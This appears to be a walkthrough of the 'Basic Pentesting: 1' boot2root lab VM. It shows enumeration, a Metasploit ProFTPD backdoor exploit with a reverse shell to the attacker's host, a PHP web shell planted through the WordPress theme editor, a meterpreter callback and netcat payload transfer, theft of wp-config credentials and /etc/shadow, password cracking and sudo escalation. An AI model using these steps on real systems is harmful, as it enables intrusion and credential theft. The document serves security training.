As suggested by its name, Basic Pentesting: 1 is a boot2root for beginners. Its description says that it contains numerous vulnerabilities and priv esc routes, so this walkthrough may be updated as I try to go back and identify them all. You can find the file here. The VM was created for virtualbox, but I found it to work with VMWare, too. The only time that there seems to be an issue is when you try to power off the target. But if you generate a snapshot of the VM before you start working on it (something I suggest anyway so that you can always return the target to a pristine state), then this is not a problem.
Scanning
First step is to find the target machine. We’ll accomplish this through arp-scan which broadcasts ARP packets and prints any responses.
Starting arp-scan 1.9 with 32 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.10.7.1 00:50:56:c0:00:01 VMware, Inc.
10.10.7.9 00:0c:29:6a:43:65 VMware, Inc.
10.10.7.30 00:50:56:e2:d6:46 VMware, Inc.
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 32 hosts scanned in 2.077 seconds (15.41 hosts/sec). 3 responded
As the only hosts running on my lab network are my kali box and the target, our target must be located at 10.10.7.9.
At this point, it’s important to note that the creator suggests adding the host to your /etc/hosts file. This is important to do. Add the following line to /etc/hosts (change the IP to match your network)
Next step is to determine what ports are open using nmap.
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:03
Completed NSE at 10:03, 0.00s elapsed
Initiating NSE at 10:03
Completed NSE at 10:03, 0.00s elapsed
Initiating ARP Ping Scan at 10:03
Scanning 10.10.7.9 [1 port]
Completed ARP Ping Scan at 10:03, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:03
Scanning vtcsec (10.10.7.9) [65535 ports]
Discovered open port 21/tcp on 10.10.7.9
Discovered open port 80/tcp on 10.10.7.9
Discovered open port 22/tcp on 10.10.7.9
Completed SYN Stealth Scan at 10:03, 3.89s elapsed (65535 total ports)
Initiating Service scan at 10:03
Scanning 3 services on vtcsec (10.10.7.9)
Completed Service scan at 10:03, 9.93s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against vtcsec (10.10.7.9)
NSE: Script scanning 10.10.7.9.
Initiating NSE at 10:03
Completed NSE at 10:03, 24.19s elapsed
Initiating NSE at 10:03
Completed NSE at 10:03, 0.00s elapsed
Nmap scan report for vtcsec (10.10.7.9)
Host is up (0.00029s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)
| 256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)
|_ 256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:6A:43:65 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Uptime guess: 76.603 days (since Thu Oct 19 20:35:32 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.29 ms vtcsec (10.10.7.9)
NSE: Script Post-scanning.
Initiating NSE at 10:03
Completed NSE at 10:03, 0.00s elapsed
Initiating NSE at 10:03
Completed NSE at 10:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.27 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65555 (2.623MB)
nmap notifies us that there are 3 listening ports, 21, 22, and 80.
Port :21
There is an ftp server listening on port 21. nmap informs us that the ftp service is likely ProFTPD 1.3.3c.
Port :22
There is an ssh service listening on port 22. nmap informs us that is is likely OpenSSH 7.2p2 Ubuntu 4ubuntu2.2. This is also a pretty good indicator that our target is running Ubuntu.
Port :80
There is an http server listening on port 80. It is likely Apache httpd 2.4.18.
Visiting the site shows a default Apache page.
Following my standard procedures for web servers, I next started a nikto and dirb scan
nikto
---------------------------------------------------------------------------
+ Target IP: 10.10.7.9
+ Target Hostname: 10.10.7.9
+ Target Port: 80
+ Start Time: 2018-01-04 10:03:59 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xb1 0x55e1c7758dcdb
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/>; rel="https://api.w.org/"
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7517 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2018-01-04 10:04:20 (GMT-5) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
dirb
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Jan 4 10:04:04 2018
URL_BASE: http://10.10.7.9/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.7.9/ ----
+ http://10.10.7.9/index.html (CODE:200|SIZE:177)
==> DIRECTORY: http://10.10.7.9/secret/
+ http://10.10.7.9/server-status (CODE:403|SIZE:297)
---- Entering directory: http://10.10.7.9/secret/ ----
+ http://10.10.7.9/secret/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://10.10.7.9/secret/wp-admin/
==> DIRECTORY: http://10.10.7.9/secret/wp-content/
==> DIRECTORY: http://10.10.7.9/secret/wp-includes/
+ http://10.10.7.9/secret/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://10.10.7.9/secret/wp-admin/ ----
+ http://10.10.7.9/secret/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.7.9/secret/wp-admin/css/
==> DIRECTORY: http://10.10.7.9/secret/wp-admin/images/
==> DIRECTORY: http://10.10.7.9/secret/wp-admin/includes/
+ http://10.10.7.9/secret/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.7.9/secret/wp-admin/js/
==> DIRECTORY: http://10.10.7.9/secret/wp-admin/maint/
==> DIRECTORY: http://10.10.7.9/secret/wp-admin/network/
==> DIRECTORY: http://10.10.7.9/secret/wp-admin/user/
---- Entering directory: http://10.10.7.9/secret/wp-content/ ----
+ http://10.10.7.9/secret/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://10.10.7.9/secret/wp-content/plugins/
==> DIRECTORY: http://10.10.7.9/secret/wp-content/themes/
---- Entering directory: http://10.10.7.9/secret/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.7.9/secret/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.7.9/secret/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.7.9/secret/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.7.9/secret/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.7.9/secret/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.7.9/secret/wp-admin/network/ ----
+ http://10.10.7.9/secret/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://10.10.7.9/secret/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://10.10.7.9/secret/wp-admin/user/ ----
+ http://10.10.7.9/secret/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://10.10.7.9/secret/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://10.10.7.9/secret/wp-content/plugins/ ----
+ http://10.10.7.9/secret/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://10.10.7.9/secret/wp-content/themes/ ----
+ http://10.10.7.9/secret/wp-content/themes/index.php (CODE:200|SIZE:0)
nikto and dirb both indicate the existence of a secret directory at /secret/. Furthermore, the files and directories discovered by dirb suggest that at /secret/ is a wordpress site. Visiting the page quickly confirms this, so we will run a scan to enumerate the site.
wpscan
[+] Started: Thu Jan 4 10:52:46 2018
[!] The WordPress 'http://10.10.7.9/secret/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://vtcsec/secret/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://10.10.7.9/secret/xmlrpc.php
[!] Includes directory has directory listing enabled: http://10.10.7.9/secret/wp-includes/
[+] WordPress version 4.9 (Released on 2017-11-15) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
[!] 4 vulnerabilities identified from the version number
[!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
Reference: https://wpvulndb.com/vulnerabilities/8966
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
[i] Fixed in: 4.9.1
[!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
Reference: https://wpvulndb.com/vulnerabilities/8967
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
[i] Fixed in: 4.9.1
[!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
Reference: https://wpvulndb.com/vulnerabilities/8968
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
Reference: https://wpvulndb.com/vulnerabilities/8969
Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
[i] Fixed in: 4.9.1
[+] WordPress theme in use: twentyseventeen - v1.4
[+] Name: twentyseventeen - v1.4
| Latest version: 1.4 (up to date)
| Last updated: 2017-11-16T00:00:00.000Z
| Location: http://10.10.7.9/secret/wp-content/themes/twentyseventeen/
| Readme: http://10.10.7.9/secret/wp-content/themes/twentyseventeen/README.txt
| Style URL: http://10.10.7.9/secret/wp-content/themes/twentyseventeen/style.css
| Referenced style.css: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css
| Theme Name: Twenty Seventeen
| Theme URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
| Author: the WordPress team
| Author URI: https://wordpress.org/
[+] Enumerating installed plugins (only ones with known vulnerabilities) ...
Time: 00:00:02 <=======================> (1600 / 1600) 100.00% Time: 00:00:02
[+] No plugins found
[+] Enumerating installed themes (only ones with known vulnerabilities) ...
Time: 00:00:00 <=========================> (283 / 283) 100.00% Time: 00:00:00
[+] No themes found
[+] Enumerating timthumb files ...
Time: 00:00:02 <=======================> (2541 / 2541) 100.00% Time: 00:00:02
[+] No timthumb files found
[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
+----+-------+-------------------+
| Id | Login | Name |
+----+-------+-------------------+
| 1 | admin | admin – My secret |
+----+-------+-------------------+
[!] Default first WordPress username 'admin' is still used
[+] Finished: Thu Jan 4 10:53:03 2018
[+] Requests Done: 4514
[+] Memory used: 113.613 MB
[+] Elapsed time: 00:00:16
By specifying the -e flag, the tool tries to determine the version of WordPress, any running plugins, installed themes, etc. and return known vulnerabilities for them. It also identified a user named admin (located at the bottom of the script’s output).
Wpscan can also be used to bruteforce login to wordpress sites, but since admin is a default user, let’s see if we can just log in using admin as the password, too.
Success!
Vulnerability Analysis
FTP
Searchsploit indicates that this version of ProFTPD has been backdoored, and better yet, there is a metasploit module for the exploit. This will definitely be worth investigating.
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------- ----------------------------------
ProFTPd 1.3.3c - Compromised Source Backdoor | exploits/linux/remote/15662.txt
ProFTPd-1.3.3c - Backdoor Command Execution | exploits/linux/remote/16921.rb
--------------------------------------------- ----------------------------------
SSH
Not much to see here. There is a vulnerability in this version of OpenSSH that allows username enumeration, but since we are likely to get shell through either FTP or HTTP, I’m marking this as check last.
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------- ----------------------------------
OpenSSH 7.2p2 - Username Enumeration | exploits/linux/remote/40136.py
OpenSSHd 7.2p2 - Username Enumeration (PoC) | exploits/linux/remote/40113.txt
--------------------------------------------- ----------------------------------
HTTP
There are no apparent vulnerabilities associated with our version of Apache. But since we are logged in to the WordPress site, we can leverage our access to get a webshell. We’ll explore this in the HTTP portion of Exploitation below.
Exploitation
FTP
Using searchsploit earlier, we know that there is a metasploit module to exploit the backdoor built in to this version of ProFTPD. We can quickly find it using search:
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent ProFTPD-1.3.3c Backdoor Command Execution
Now that we’ve identified the module, we load it and set the various settings (you can always use show options if you’re unsure of what they are, or want to verify that they are correctly configured)
msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse_perl
msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 10.10.7.5
msf exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 10.10.7.5
msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 10.10.7.9
Our payload is ready. Execute it with run and wait a few seconds. Metasploit will establish a connection with the FTP server and execute our payload to generate a shell on the target machine. Once it is established, we quickly improve the environment with our python one-liner. And check our current user.
[*] Started reverse TCP handler on 10.10.7.5:4444
[*] 10.10.7.9:21 - Sending Backdoor Command
[*] Command shell session 1 opened (10.10.7.5:4444 -> 10.10.7.9:42556) at 2018-01-04 12:03:51 -0700
python -c 'import pty; pty.spawn("/bin/bash")'
root@vtcsec:/# whoami
whoami
root
root@vtcsec:/#
We have root! At this point, we’ve owned the machine and can do whatever we want to do. But let’s explore the web shell route.
HTTP
To get a webshell, we go to the theme editor which allows us to directly edit the php code of the various pages in the installed themes. In order to avoid causing any problems with the site (and, in theory, avoid instant detection), we will edit a page in a theme that is not in use. Kali has a number of web shells built in at /usr/share/webshells/. The most feature-filled php shell seems to be qsd-php-backdoor.php. If we replace the content of one of the .php pages in our unused theme (I am editing 404.php in the Twenty Fifteen theme) with the content of the qsd backdoor, then we should be able to navigate to this page and see our webshell. EDIT: After completing this machine, I remembered another php web shell that I had run across on another boot2root that is very well done and definitely worth adding to your kit. It emulates a BASH environment directly in your browser, making it for more useful than qsd in my mind. It can be found here.
Question is, where is this file located? Dirb gives us a hint. Dirb found a directory labeled /secret/wp-content/themes/. We know the name of our theme, and the name of our page, so it’s fairly simple to guess the rest of the URL: http://vtcsec/secret/wp-content/themes/twentyfifteen/404.php
We now have a web shell on the target and can run almost any command that we want to as www-data.
Post Exploitation
Improving our environment
An interactive shell is better than a web shell, though, so now that we can run commands on the target, let’s improve our working environment by using it to transfer an msfvenom payload to the target and get a meterpreter shell.
First, generate the payload:
While our payload is generating we need to get metasploit ready to handle the incoming meterpreter connection:
msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.7.5
lhost => 10.10.7.5
msf exploit(multi/handler) > set lport 52822
lport => 52822
msf exploit(multi/handler) > run
Once generated, we need to transfer the msfvenom payload to the target machine. There are many ways to do this, I generally choose netcat as the simplest. On the kali box, prep our netcat listener to transmit the payload:
In the webshell, enter the following command and execute it. The string will connect to our Kali box and save anything transmitted (our msfvenom payload) to a file in /tmp/ called rshell. It will then change the permissions to allow the payload to be executed, and execute it. We need to ensure that both our metasploit handler and our nc listener on our kali box are listening, as the below string will connect to both of them.
If the command is successful, we should see two things: a successful connection to our nc listener, and an incoming meterpreter connection. The expected output for both is shown below:
[cc lang="text" line_numbers="false" nowrap="true"]
listening on [any] 52800 ...
connect to [10.10.7.5] from vtcsec [10.10.7.9] 56908
sent 207, rcvd 0
[*] Started reverse TCP handler on 10.10.7.5:52822
[*] Sending stage (857352 bytes) to 10.10.7.9
[*] Meterpreter session 2 opened (10.10.7.5:52822 -> 10.10.7.9:57618) at 2018-01-04 12:28:30 -0700
meterpreter >
Privilege Escalation
Now that we have a meterpreter session on the target, it’s time to do some further reconnaissance. There is a good tool that can automate some of this for us called linuxprivchecker.py (available here). We can use meterpreter to upload this file to our target, and then use the shell to execute it:
meterpreter > channel -i 1
www-data@vtcsec:/tmp$ python linuxprivchecker.py > linuxprivchecker.out
When the script has completed running, we can background our shell with ctrl+z and download the output for easier viewing. While we’re at it, let’s grab a few other interesting files.
meterpreter > download /var/www/html/secret/wp-config.php /root/Documents/vtcsec/
meterpreter > download /etc/passwd /root/Documents/vtcsec/
meterpreter > download /etc/group /root/Documents/vtcsec/
Looking in wp-config, we can find some database credentials that may come in handy: username(root) password(arootmysqlpass)
One thing that stands out in the output of linuxprivchecker is the fact that /etc/shadow is readable, so let’s grab that as well!
Inside /etc/shadow, we can see a password hash for the user marlinspike. Let’s use john to try to crack it.
john unshadowed
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
marlinspike (marlinspike)
1g 0:00:00:00 DONE 1/3 (2018-01-04 10:04) 12.50g/s 100.0p/s 100.0c/s 100.0C/s marlinspike..marlinspikes
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Weak passwords ftw! We can now log in as this user and stop acting as www-data. Do this either via SSH or simply using su in our current meterpreter session.
We can check to see what, if any, commands that our new user is allowed to run with sudo:
Matching Defaults entries for marlinspike on vtcsec:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User marlinspike may run the following commands on vtcsec:
(ALL : ALL) ALL
Seems as if our user is able to run any command with sudo… Tha means we should be able to switch user to root:
root
We now have root!
There appear to be some other vulnerabilities present as well. Linuxprivchecker.py seemed to think that the MySQL service running could be used to priv esc to root, however when I checked it did not appear to be running with root privileges (a requirement for the exploit to work), so I did not try it. I also noticed that ImageMagick-6 seems to be installed. This has a lot of vulnerabilities associated with it and would be worth investigating. But we can sudo su, so I will leave it there for now.